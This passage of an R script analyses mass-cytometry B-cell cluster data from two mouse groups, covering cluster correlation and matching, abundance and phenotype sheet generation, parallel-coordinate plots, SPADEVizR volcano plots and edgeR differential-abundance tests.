      # Still inside the same cluster: just extend the run length.
      cluster_count[j] = cluster_count[j] + 1
    }else{
      # Cluster boundary: flush the aggregate for the run ending at row i.
      cluster_count[j] = cluster_count[j] + 1
      for(n in 1:ncol(mean_marker_total_cells)){
        if(n == 1){
          mean_marker_total_cells[k,n] = raw_table$Cluster[i]
        }
        if(n == 2){
          mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
        if(n > 2){
          mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
      }
      # Grow the result by a placeholder row for the next cluster.
      mean_marker_total_cells = rbind(mean_marker_total_cells, 0)
      j = j + 1
      k = k + 1
    }
  }
  # Min-max rescale helper: maps a column's values onto [0, 1].
  tmp_rescale <- function(x) (x-min(x))/(max(x) - min(x))
  tmp_mean_marker_total_cells = mean_marker_total_cells
  tmp_mean_marker_total_cells$Cluster = paste(experiment_name,
                                              "_",
                                              tmp_mean_marker_total_cells$Cluster,
                                              sep = "")
  # Promote the prefixed cluster names to rownames.
  rownames(tmp_mean_marker_total_cells) = tmp_mean_marker_total_cells[,1]
  tmp_mean_marker_total_cells = tmp_mean_marker_total_cells[,-1]
  # Keep an unrescaled copy of the counts in "Count1" (it is the last
  # column, so the rescale loop below deliberately skips it).
  tmp_mean_marker_total_cells$Count1 = tmp_mean_marker_total_cells$Count
  if(rescale==TRUE){
    for(i in 1:(ncol(tmp_mean_marker_total_cells)-1)){
      tmp_mean_marker_total_cells[,i] = tmp_rescale(tmp_mean_marker_total_cells[,i])
    }
  }
  return(tmp_mean_marker_total_cells)
}
### Change experiment_file names to match reformatted excel sheets used for SpadevizR
## All files must be in correct folder in the working path in order to run code!
# Build rescaled per-cluster summaries for both groups, then compute the
# pairwise Pearson correlation of every Grp1 cluster against every Grp2
# cluster (across rescaled marker means + count) and write the ranked
# table to CSV.
experiment1 = rescale_to_0_1(experiment_name = "Grp1",
                             experiment_file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt",
                             rescale = TRUE)
#includes count - can # if dont want to rank based on count
#experiment1 = experiment1[, colnames(experiment1) != "Count"]
experiment2 = rescale_to_0_1(experiment_name = "Grp2",
                             experiment_file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt",
                             rescale = TRUE)
#includes count - can # if dont want to rank based on count
#experiment2 = experiment2[, colnames(experiment2) != "Count"]
# Keep "_1" copies (with the raw Count1 column) for reporting counts;
# drop Count1 from the versions fed into the correlation.
experiment1_1 = experiment1
experiment1 = experiment1[, colnames(experiment1) != "Count1"]
experiment2_1 = experiment2
experiment2 = experiment2[, colnames(experiment2) != "Count1"]
#create a blank table to store the pearson correlation results
experiment1_experiment2_Pearson_correlation<-data.frame(experiment1_cluster = 0, experiment2_cluster = 0, experiment1_count = 0, experiment2_count = 0)
#perform pairwise pearson correlation between experiment1 and experiment2
# NOTE(review): growing the frame with rbind() inside the loop is O(n^2),
# and the final iteration appends an all-zero row that is never removed —
# it survives into the sorted output/CSV. Consider preallocating and
# dropping the trailing row.
t=1
for(i in 1:nrow(experiment1)){
  for(j in 1:nrow(experiment2)){
    experiment1_experiment2_Pearson_correlation$experiment1_cluster[t]<-rownames(experiment1)[i]
    experiment1_experiment2_Pearson_correlation$experiment2_cluster[t]<-rownames(experiment2)[j]
    pearson_statictis<-cor.test(as.numeric(experiment1[i,]),as.numeric(experiment2[j,]),method = "pearson")
    experiment1_experiment2_Pearson_correlation$cor[t]<-pearson_statictis$estimate
    experiment1_experiment2_Pearson_correlation$p.value[t]<-pearson_statictis$p.value
    experiment1_experiment2_Pearson_correlation$experiment1_count[t]<-experiment1_1$Count1[i]
    experiment1_experiment2_Pearson_correlation$experiment2_count[t]<-experiment2_1$Count1[j]
    t<-t+1
    experiment1_experiment2_Pearson_correlation<-rbind(experiment1_experiment2_Pearson_correlation, 0)
  }
}
# Reorder columns: cluster pair, cor, p-value, then the raw counts.
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[, c(1,2,5,6,3,4)]
#Sorting the data for better view
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[
  order(experiment1_experiment2_Pearson_correlation$cor, decreasing = TRUE),]
#Take a look at the results
View(experiment1_experiment2_Pearson_correlation)
# create a CSV file storing the pearson correlation data
write.csv(experiment1_experiment2_Pearson_correlation, "DR3 D51 B Cells Pearsons Coefficient.csv", row.names = FALSE)
####################################################################################################################################################################################
####################################################################################################################################################################################
setwd(PrimaryDirectory)
##################################################
## Matching Script - combines cluster data from group 1 and 2 and reformats to create grouped_file containing all cluster information for newly named matched clusters (n=4 -> n=8)
##################################################
# read data
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster = paste("Grp1_Cluster_", Grp1_data$Cluster, sep ="")
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster = paste("Grp2_Cluster_", Grp2_data$Cluster, sep ="")
### CHANGE Number in the parentheses to match the number of markers used (ie, 40 in Live cells -> 35 in innate cells)
# Align the two groups' marker columns (4:37) by subtracting the difference
# of their per-column minima from whichever group has the larger minimum.
# NOTE(review): "correlation" is a misnamed offset/shift, not a correlation.
for(i in 4:37){
  #i = 4
  Grp1_min = min(Grp1_data[,i])
  Grp2_min = min(Grp2_data[,i])
  if(Grp1_min > Grp2_min){
    correlation = Grp1_min - Grp2_min
    Grp1_data[,i] = Grp1_data[,i] - correlation
  }
  if(Grp2_min > Grp1_min){
    correlation = Grp2_min - Grp1_min
    Grp2_data[,i] = Grp2_data[,i] - correlation
  }
}
grouped_file = rbind(Grp1_data, Grp2_data)
### MAKE SURE THE COLUMN V ("CXCR4" has the X in it. Often group 2 sheet will read "CCR4")
# Change matching_file_name to name of .txt file that contains Group 1 Clusters and their new_name in addition to matching Group 2 Clusters and their new_name
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
# Prefix cluster ids with their group; assumes the first half of the
# matching file lists Group-1 clusters and the second half Group-2 —
# TODO confirm the file layout.
for(i in 1:(nrow(matching_file)/2)){
  matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
  matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
#match the new name
grouped_file$new_cluster_name = matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
#resort the data
grouped_file = grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
#Replace NA in new_cluster_name with original cluster number
for (i in 1: nrow(grouped_file)){
  if(is.na(grouped_file$new_cluster_name[i]) == TRUE){
    grouped_file$new_cluster_name[i] = substr(grouped_file$Cluster[i], 1, 20)
  }
}
# #delete the unmatched clusters
# grouped_file = grouped_file[!is.na(grouped_file$new_cluster_name), ]
#sorting the data for better view
grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
grouped_file = cbind(grouped_file, 0)
### CHANGE NUMBER IN BRACKETS BELOW TO MATCH NUMBER OF MARKERS + 2
# Hard-coded column index 39 = number of markers (37) + 2; breaks silently
# if the marker count changes.
colnames(grouped_file)[39] = "Cluster_new"
grouped_file = grouped_file[,c(39,1:ncol(grouped_file))]
grouped_file$Cluster = NULL
colnames(grouped_file)[1] = "Cluster"
grouped_file$Cluster = grouped_file$new_cluster_name
grouped_file$new_cluster_name = NULL
grouped_file$Cluster_new.1 = NULL
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", row.names=FALSE)
##############################################
# Generates an "Abundance" sheet to use for analysis using the frequency of the cluster in the mouse
##############################################
#-------recale function-------#
# Convert a numeric vector of counts into percentages of the vector's total.
# Returns a vector the same length as the input that sums to 100.
tmp_percent <- function(counts) {
  (counts / sum(counts)) * 100
}
#-------recale function-------#
# Source files: per-sample cluster counts for each SPADE run.
Grp1_file <- "Data for Scatter Plot Group 1.txt"
Grp2_file <- "Data for Scatter Plot Group 2.txt"
# Group 1: read, trim to the expected block, prefix and sanitize cluster ids.
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data <- as.data.frame(Grp1_data[1:185,1:17])
Grp1_data$Cluster <- paste0("Grp1_", Grp1_data$Cluster)
Grp1_data$Cluster <- gsub(" ", "_", Grp1_data$Cluster)
# Rescale every count column (all but "Cluster") to per-sample percentages.
Grp1_data[-1] <- lapply(Grp1_data[-1], tmp_percent)
# Group 2: same treatment with its own block size.
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data <- as.data.frame(Grp2_data[1:151,1:16])
Grp2_data$Cluster <- paste0("Grp2_", Grp2_data$Cluster)
Grp2_data$Cluster <- gsub(" ", "_", Grp2_data$Cluster)
Grp2_data[-1] <- lapply(Grp2_data[-1], tmp_percent)
matching_file_name <- "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file <- read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
# The matching file lists Group 1 clusters in its first half of rows and
# Group 2 clusters in its second half; prefix each cluster id accordingly.
# (Same two-column input assumption as before: Cluster, new_name.)
half_rows <- seq_len(nrow(matching_file) / 2)
matching_file$Cluster_new <- ""
matching_file$Cluster_new[half_rows] <- paste0("Grp1_Cluster_", matching_file$Cluster[half_rows])
matching_file$Cluster_new[-half_rows] <- paste0("Grp2_Cluster_", matching_file$Cluster[-half_rows])
# Keep only the prefixed id (renamed "Cluster") and the shared new name.
matching_file <- matching_file[, c(3, 1, 2)]
matching_file$Cluster <- NULL
colnames(matching_file)[1] <- "Cluster"
# Build the grouped abundance table: for each merged cluster name, pull the
# matching Group 1 and Group 2 rows, join them side by side (samples from both
# groups become the columns), and label the row "Cluster_<new_name>".
# NOTE: as in the original code, this assumes each new_name matches exactly one
# cluster per group, so cbind() yields a single row per merged cluster.
combine_matched_clusters <- function(new_name) {
  matched <- matching_file[matching_file$new_name == new_name, ]
  grp1 <- Grp1_data[Grp1_data$Cluster %in% matched$Cluster, ]
  rownames(grp1) <- grp1$Cluster
  grp1$Cluster <- NULL
  grp2 <- Grp2_data[Grp2_data$Cluster %in% matched$Cluster, ]
  rownames(grp2) <- grp2$Cluster
  grp2$Cluster <- NULL
  combined <- cbind(grp1, grp2)
  rownames(combined) <- paste("Cluster_", new_name, sep = "")
  combined
}
# The previous version seeded grouped_data with a duplicate computation of the
# first matched cluster and then dropped the seed again with grouped_data[-1, ];
# building the table in one pass removes that dead work (and the unused
# data.frame(tmp_name = 0) placeholder) while producing the same rows,
# row names, and column order.
grouped_data <- do.call(rbind, lapply(unique(matching_file$new_name), combine_matched_clusters))
write.xlsx(grouped_data, "Abundance DR3 Day 51 B Cell Data.xlsx", row.names=TRUE)
#####################################################################################################
# MODIFIED PCP (parallel coordinate plot) GENERATOR FOR PHENOTYPE
#####################################################################################################
# Return to the project root before reading the phenotype sheet generated above.
setwd(PrimaryDirectory)
### Import "Phenotype", from desired excel file - must change path and excel file name for particular function
##### MAKE SURE YOU HAVE SAVED YOUR GENERATED PHENOTYPE SHEET AS AN .XLSX File
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", sheet = "Sheet 1")
View(Phenotype)
#Must change parameters of phenotype sheet according to file size
# NOTE(review): the dimensions (5225 rows x 37 columns) are hard-coded to this
# dataset; column 3 is dropped below - presumably a non-marker column - confirm
# against the generated sheet before reusing with other data.
cluster.phenotypes <- as.data.frame(Phenotype[1:5225,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
# Modified "Pheno Viewer": draws a parallel-coordinates plot of mean marker
# expression for one merged cluster (red line) on top of the per-cluster mean
# profiles of every other cluster (grey background lines).
#
# cluster.phenotypes: data frame with columns Cluster, Term (sample id), then
#   one column per marker (columns 3+ are averaged below).
# samples: optional subset of sample names. NOTE(review): the non-NULL branch
#   reads a global 'Results' object (SPADEVizR Results slots) that is NOT a
#   parameter of this function - it only works if such a global exists; confirm
#   before calling with 'samples' set.
# clusters: id of the cluster to highlight in red.
# markers, show.mean, show.on_device, sort.markers: accepted for signature
#   compatibility with phenoViewer_modified but not referenced in this variant.
# Draws the plot on the current device and returns the ggplot object invisibly.
phenoViewer_modified_v2 <-function( cluster.phenotypes,
samples = NULL,
clusters,
markers = NULL,
show.mean = "only",
show.on_device = TRUE,
sort.markers = TRUE){
if (is.null(samples)) {
samples <- unique(cluster.phenotypes$Term)
data <- cluster.phenotypes
} else if (!all(samples %in% Results@sample.names)) {
stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
} else {
data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
}
# Drop incomplete rows, then keep only the highlighted cluster(s).
data <- stats::na.omit(data)
clusters <- unique(clusters)
clusters.select <- data[, "Cluster"] %in% clusters
data <- data[clusters.select,]
# Mean expression per sample; columns 3+ are assumed to be marker columns.
data <- plyr::ddply(data, c("Term"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
# Long format: one row per (sample, marker).
data <- reshape2::melt(data, id = c("Term"), stringsAsFactors = FALSE)
colnames(data) <- c("samples", "marker", "value")
title <- paste("Cluster_", clusters, sep = "")
# NOTE(review): data has no lower.bound/upper.bound columns at this point, so
# these bounds reduce to the range of data$value; they are computed here but
# never used below - the y scale of the plot is based on data_means instead.
max.value <- -1
min.value <- -1
max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
max.value <- max.value * (1 + sign(max.value) * 0.1)
min.value <- min.value * (1 - sign(min.value) * 0.1)
# Per-marker mean for the highlighted cluster. NOTE(review): 'means' is also
# unused below - the red line is drawn from rescale_means instead.
means <- plyr::ddply(data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(means) <- c("marker", "means")
# Build the grey background: the mean per-marker profile of EVERY cluster in
# the input table (seeded with a placeholder row that is dropped afterwards).
data_means <- data.frame(marker = 0, means= 0, clusters = 0)
tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### make sure the cluster.phenotypes file column name is "Cluster" and not "cluster"
for(i in tmp_clusters){
tmp_data<- cluster.phenotypes
tmp_clusters.select <- tmp_data[, "Cluster"] %in% i
tmp_data <- tmp_data[tmp_clusters.select,]
tmp_data <- plyr::ddply(tmp_data, c("Term"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
tmp_data <- reshape2::melt(tmp_data, id = c("Term"), stringsAsFactors = FALSE)
colnames(tmp_data) <- c("samples", "marker", "value")
tmp_means <- plyr::ddply(tmp_data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(tmp_means) <- c("marker", "means")
tmp_means$clusters = i
data_means = rbind(data_means, tmp_means)
}
# Drop the placeholder row used to seed data_means.
data_means = data_means[-1, ]
rescale_data_means = data_means
# Profile of the highlighted cluster only (drawn in red on top of the grey lines).
rescale_means = data_means[data_means$clusters == clusters,]
plot <- ggplot2::ggplot(data = rescale_data_means) +
ggplot2::ggtitle(bquote(atop(.(title))))
# Grey background lines: one line per cluster.
plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
size = 0.4,
alpha = 1,
color = "#CCCCCC")+
ggplot2::scale_y_continuous(limits = c(min(data_means$means), max(data_means$means)), breaks = round(seq(0, max(data_means$means), by = 1), 0)) +
ggplot2::theme_bw()
# Red foreground line: the selected cluster.
plot <- plot + ggplot2::geom_line(data = rescale_means,
ggplot2::aes_string(x = "marker", y = "means", group = 1),
linetype = "solid",
size = 1,
color = "#FF6666")
plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = "bold")) +
ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
legend.key = ggplot2::element_blank(),
plot.title = ggplot2::element_text(hjust=0.5)) +
ggplot2::xlab("markers") +
ggplot2::ylab("marker expressions") +
ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
grid::grid.draw(plot)
invisible(plot)
}
# Should you only want to see one cluster image
# phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
#                         clusters = "2887")
dir.create("Grouped_ClusterImages", showWarnings = FALSE)
setwd("Grouped_ClusterImages")
# Restrict to the merged clusters (named 1-31 after matching) and render one
# parallel-coordinate image per cluster.
a = cluster.phenotypes[which(cluster.phenotypes$Cluster %in% c(1:31)), ]
for (i in unique(a$Cluster)){
  # paste0 avoids the stray spaces ("Cluster_ 1 .jpeg") that paste()'s default
  # sep = " " produced, matching the naming used elsewhere in this script.
  jpeg(paste0("Cluster_", i, ".jpeg"),
       width=2000,
       height=1500,
       res = 300)
  phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
                          clusters = i)
  dev.off()
}
setwd(PrimaryDirectory)
##################################################
# GENERATES PHENOTYPE SHEET FOR GROUPED CLUSTERS TO BE USED FOR SPADEVIZR ANALYSIS
##################################################
# Read the raw per-cell phenotype exports for each SPADE run and prefix
# their cluster ids with the group name.
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster <- paste0("Grp1_Cluster_", Grp1_data$Cluster)
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster <- paste0("Grp2_Cluster_", Grp2_data$Cluster)
### CHANGE to match number of markers
# Align each marker column so both groups share the same minimum: whichever
# group sits higher gets shifted down by the difference between the minima.
for (i in 4:37) {
  shift <- min(Grp1_data[, i]) - min(Grp2_data[, i])
  if (shift > 0) {
    Grp1_data[, i] <- Grp1_data[, i] - shift
  } else if (shift < 0) {
    Grp2_data[, i] <- Grp2_data[, i] + shift
  }
}
# Stack both groups into one table.
grouped_file <- rbind(Grp1_data, Grp2_data)
# Change matching_file_name to name of .txt file that contains Group 1 Clusters and their new_name in addition to matching Group 2 Clusters and their new_name
matching_file_name <- "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file <- read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
# First half of the rows are Group 1 clusters, second half Group 2; prefix the
# cluster ids so they line up with the ids in grouped_file.
# (Same two-column input assumption as before: Cluster, new_name.)
half_rows <- seq_len(nrow(matching_file) / 2)
matching_file$Cluster_new <- ""
matching_file$Cluster_new[half_rows] <- paste0("Grp1_Cluster_", matching_file$Cluster[half_rows])
matching_file$Cluster_new[-half_rows] <- paste0("Grp2_Cluster_", matching_file$Cluster[-half_rows])
matching_file <- matching_file[, c(3, 1, 2)]
matching_file$Cluster <- NULL
colnames(matching_file)[1] <- "Cluster"
# Look up the shared (merged) name for every phenotype row; unmatched rows get NA.
grouped_file$new_cluster_name <- matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
# Move new_cluster_name next to the identifier columns.
grouped_file <- grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
# Replace NA in new_cluster_name with the first 9 characters of the original
# cluster id ("Grp1_Clus"/"Grp2_Clus"), which marks the cluster as unmatched.
# Vectorized logical-mask replacement instead of a row-by-row loop.
unmatched <- is.na(grouped_file$new_cluster_name)
grouped_file$new_cluster_name[unmatched] <- substr(grouped_file$Cluster[unmatched], 1, 9)
#delete the unmatched clusters
grouped_file <- grouped_file[grouped_file$new_cluster_name != "Grp1_Clus", ]
grouped_file <- grouped_file[grouped_file$new_cluster_name != "Grp2_Clus", ]
# Promote new_cluster_name to the "Cluster" column and move it to the front.
# Computed column positions replace the old hard-coded index (39), so nothing
# needs manual editing when the number of markers changes. Final layout is
# identical to the previous cbind/reorder/dedupe sequence.
grouped_file$Cluster <- grouped_file$new_cluster_name
grouped_file$new_cluster_name <- NULL
cluster_col <- which(colnames(grouped_file) == "Cluster")
grouped_file <- grouped_file[, c(cluster_col, setdiff(seq_len(ncol(grouped_file)), cluster_col))]
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", row.names=FALSE)
# FILE GENERATED ABOVE SERVES AS PHENOTYPE SHEET FOR SPADEVIZR ANALYSIS
##################################################
# SPADEVIZR ANALYSIS - FOR COMBINED GROUP DATA:
##################################################
### Imports the grouped Abundance and Phenotype sheets generated above - must
### change path and excel file name for a different experiment.
Abundance <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
View(Abundance)
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", sheet = "Sheet 1")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - NOTE(review): the dimensions
### below (31x32 abundances, 961x37 phenotypes) are hard-coded to this dataset
### and must be edited to match the actual sheet sizes (rows, columns).
cluster.abundances <- as.data.frame(Abundance[1:31,1:32])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:961,1:37])
# Column 3 is dropped - presumably a non-marker column; confirm against the sheet.
cluster.phenotypes <- cluster.phenotypes[,-3]
cluster.phenotypes$Cluster = paste("Cluster_", cluster.phenotypes$Cluster, sep ="")
# Build the SPADEVizR Results object used by all downstream analyses.
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### Sample names per experimental condition, based on experiment layout.
### These must match the column names of cluster.abundances exactly (copy and
### paste group names from the console window to assure names are correct).
Control <- c("c05_Grp1_DR3_D51_B.Cells._37p", "c05_GRP2_DR3_Day51_B.Cells._37p", "c06_Grp1_DR3_D51_B.Cells._37p", "c06_GRP2_DR3_Day51_B.Cells._37p", "c07_Grp1_DR3_D51_B.Cells._37p", "c07_GRP2_DR3_Day51_B.Cells._37p", "c08_Grp1_DR3_D51_B.Cells._37p", "c08_GRP2_DR3_Day51_B.Cells._37p")
Naive_Chal <- c("c01_Grp1_DR3_D51_B.Cells._37p", "c02_Grp1_DR3_D51_B.Cells._37p", "c02_GRP2_DR3_Day51_B.Cells._37p", "c03_Grp1_DR3_D51_B.Cells._37p", "c03_GRP2_DR3_Day51_B.Cells._37p", "c04_Grp1_DR3_D51_B.Cells._37p", "c04_GRP2_DR3_Day51_B.Cells._37p")
Vax_Chal <- c("c09_Grp1_DR3_D51_B.Cells._37p", "c09_GRP2_DR3_Day51_B.Cells._37p", "c10_Grp1_DR3_D51_B.Cells._37p", "c10_GRP2_DR3_Day51_B.Cells._37p", "c11_Grp1_DR3_D51_B.Cells._37p", "c11_GRP2_DR3_Day51_B.Cells._37p", "c12_Grp1_DR3_D51_B.Cells._37p", "c12_GRP2_DR3_Day51_B.Cells._37p")
Vax_Unchal <- c("c13_Grp1_DR3_D51_B.Cells._37p", "c13_GRP2_DR3_Day51_B.Cells._37p", "c14_Grp1_DR3_D51_B.Cells._37p", "c14_GRP2_DR3_Day51_B.Cells._37p", "c15_Grp1_DR3_D51_B.Cells._37p", "c15_GRP2_DR3_Day51_B.Cells._37p", "c16_Grp1_DR3_D51_B.Cells._37p", "c16_GRP2_DR3_Day51_B.Cells._37p")
### Generates Volcano plots for all conditions selected
## If want to change p-value to 0.01, change "th.pvalue = 0.01"
# To run an unpaired T-test, method.paired = FALSE. To run a paired T-test use, method.paired = TRUE
### Generates CSV files for all p values for all clusters and saves them in a folder in your working directory
dir.create("SpadevizR Analysis and Volcano Plots", showWarnings = FALSE)
setwd("SpadevizR Analysis and Volcano Plots")
# Run one differentially-abundant-cluster (DAC) comparison:
#  - identifyDAC() on the two sample groups (unpaired, p < 0.05, |FC| > 1,
#    raw counts, not percentages)
#  - print the per-cluster statistics and write them to csv_file
#  - render the volcano plot to tiff_file
# Returns the DAC results object so it can be kept for later inspection.
# (Replaces six copy-pasted variants of the same nine lines.)
run_dac_comparison <- function(cond1, cond2, csv_file, tiff_file) {
  dac <- identifyDAC(results, condition1 = cond1, condition2 = cond2,
                     th.pvalue = 0.05, th.fc = 1, method.paired = FALSE,
                     use.percentages = FALSE)
  print(dac@results)
  write.csv(dac@results, csv_file, row.names = FALSE)
  tiff(tiff_file, width = 2000, height = 1500, res = 300)
  SPADEVizR::plot(dac)
  dev.off()
  dac
}
resultsDAC_CvNC <- run_dac_comparison(Control, Naive_Chal, "Control_v_Naive_Chal_DAC_p_values.csv", "Control vs Naive_chal.tiff")
resultsDAC_CvVU <- run_dac_comparison(Control, Vax_Unchal, "Control_v_Vax_Unchal_DAC_p_values.csv", "Control vs Vax_Unchal.tiff")
resultsDAC_NCvVC <- run_dac_comparison(Naive_Chal, Vax_Chal, "Naive_Chal_v_Vax_Chal_DAC_p_values.csv", "Naive_Chal vs Vax_Chal.tiff")
resultsDAC_VUvVC <- run_dac_comparison(Vax_Unchal, Vax_Chal, "Vax_Unchal_v_Vax_Chal_DAC_p_values.csv", "Vax_Unchal vs Vax_Chal.tiff")
resultsDAC_CvVC <- run_dac_comparison(Control, Vax_Chal, "Control_v_Vax_Chal_DAC_p_values.csv", "Control vs Vax_Chal.tiff")
resultsDAC_NCvVU <- run_dac_comparison(Naive_Chal, Vax_Unchal, "Naive_Chal_v_Vax_Unchal_DAC_p_values.csv", "Naive_Chal vs Vax_Unchal.tiff")
setwd(PrimaryDirectory)
###################################################
# Analysis with edgeR
###################################################
# Differential cluster-abundance test between two sample groups using edgeR's
# quasi-likelihood GLM pipeline (glmQLFit/glmQLFTest).
#
# data_experiment / data_control: cluster x sample abundance data frames.
# experiment_sample_size / control_sample_size: number of samples (columns)
#   in each group; used to build the design factor ("A" = experiment,
#   "B" = control), so they must match the column counts.
# export_file_name: output file name without extension.
# Prints and View()s the top-200 table (BH-adjusted, sorted by p-value) and
# writes it to "<export_file_name>.csv".
edgeR_analysis <- function(data_experiment, data_control, experiment_sample_size, control_sample_size, export_file_name){
  tmp_cluster.abundances <- cbind(data_experiment, data_control)
  # Group assignment: "A" = experiment columns, "B" = control columns.
  conditions <- c(rep("A", experiment_sample_size), rep("B", control_sample_size))
  y <- DGEList(tmp_cluster.abundances)
  # Because the data has been rescaled, the usual low-count filter
  # (keep <- aveLogCPM(y) >= aveLogCPM(5, mean(y$samples$lib.size)))
  # cannot be used, so all clusters are kept.
  design <- model.matrix(~factor(conditions))
  y <- estimateDisp(y, design)
  fit <- glmQLFit(y, design, robust=TRUE)
  # coef=2 tests the experiment-vs-control contrast.
  res <- glmQLFTest(fit, coef=2)
  DAC <- topTags(res, n=200, adjust.method="BH", sort.by="PValue", p.value=1)
  print(DAC)
  View(DAC)
  write.csv(DAC, paste0(export_file_name, ".csv"), row.names = TRUE)
}
# Subset the abundance matrix to the samples belonging to each condition.
Vax_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Chal]
Naive_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Naive_Chal]
Control.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Control]
Vax_Unchal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Unchal]
dir.create("EdgeR Analysis", showWarnings = FALSE)
setwd("EdgeR Analysis")
### Change data_experiment and data_control to the groups you want to compare,
### and export_file_name to depict the groups being compared. Sample sizes are
### derived with ncol() from the subsets themselves, so they always match the
### number of columns actually present (the old hand-counted 8/7/8/8 values
### silently broke when a sample name did not match).
edgeR_analysis(data_experiment = Vax_Chal.abundances,
               data_control = Naive_Chal.abundances,
               experiment_sample_size = ncol(Vax_Chal.abundances),
               control_sample_size = ncol(Naive_Chal.abundances),
               export_file_name = "Vax_Chal v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Vax_Chal.abundances,
               data_control = Vax_Unchal.abundances,
               experiment_sample_size = ncol(Vax_Chal.abundances),
               control_sample_size = ncol(Vax_Unchal.abundances),
               export_file_name = "Vax_Chal v Vax_Unchal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
               data_control = Naive_Chal.abundances,
               experiment_sample_size = ncol(Control.abundances),
               control_sample_size = ncol(Naive_Chal.abundances),
               export_file_name = "Control v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
               data_control = Vax_Unchal.abundances,
               experiment_sample_size = ncol(Control.abundances),
               control_sample_size = ncol(Vax_Unchal.abundances),
               export_file_name = "Control v Vax_Unchal EdgeR Analysis")
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
# Re-export the grouped abundance sheet as tab-delimited text for plotting.
Grouped_SheetFour <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
